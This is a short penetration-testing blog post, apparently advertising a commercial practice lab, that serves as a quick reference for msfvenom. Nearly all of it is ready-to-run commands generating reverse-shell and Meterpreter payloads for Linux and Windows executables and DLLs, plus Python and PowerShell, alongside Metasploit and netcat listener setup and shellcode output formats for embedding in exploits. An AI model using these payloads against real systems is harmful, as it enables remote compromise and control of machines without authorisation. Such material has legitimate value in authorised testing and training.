Back to Posts

MSF Venom Quick Guide

Posted in Pentesting

Checkout Slayer Labs!
Networks Engineered to Exploit.
- Windows/UNIX - Domains/Subnets - Initial/Post/Lateral - Low Cost VPN Ranges -


Generation Commands


Linux

Staged Meterpreter

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > shell-meterp.elf


Inline Meterpreter

msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=YourIP LPORT=YourPort -f elf > santas.elf



Windows

Executable with Meterpreter

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-meterp.exe


Executable with Windows cmd

msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-cmd.exe


Windows DLL with Windows cmd

msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f dll > shell-cmd.dll


Execute Windows Command - generate dll named shell32.dll that will pop calc when ran

msfvenom -f dll -p windows/exec CMD="C:\windows\system32\calc.exe" -o shell32.dll

Languages

Python

msfvenom -p cmd/unix/reverse_python LHOST=YourIP LPORT=YourPort -f raw


Powershell

msfvenom -p windows/powershell_reverse_tcp LHOST=YourIP LPORT=YourPort -f raw

Usage Tips


Payload Options

msfvenom -p [payload] --payload-options
msfvenom -p windows/meterpreter/reverse_tcp --payload-options


List encoders

root@kali:/# msfvenom -l encoders

Encoding you payload in x86/shikata_ga_nai is great, but sometimes your shell code has bad chars and shikata_gi_nai may throw an error on generation. Using this command you should be able to find an encoder that will fit your parameters.

Create Listener

In Metasploit set Listener for Windows Meterpreter

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp


In Metasploit set Listener for Linux Meterpreter

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp

Set Netcat Listener

nc -lvp YourPort

Formats

You can generate the shell output in two different formats: Executable or Transform. It will depend on the scenario as to which one you’ll choose.

Executable - It’s own executable shell with an extension .elf .exe .py .php etc. Eg: You have an unstable non-interactive low priv shell and you want to get something more stable and efficient on a vulnerable windows machine. You’d generate the payload as an .exe, create a listener, upload and execute.

Transform - Raw shellcode that can be pasted into an existing exploit. The transform format will depend on what that exploit is written in. Eg: You need to create shell code to paste into your code execution exploit that’s ultimately ran by a vulnerable public facing web app in javascript. To format your shellcode, you may want to use: -f js_le (java script_little endian)

List of formats…

root@kali:/# msfvenom --help-formats 
Executable formats
	asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
	bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

Custom Cyber Ranges >>

https://slayerlabs.com

Read Next

Secure SSH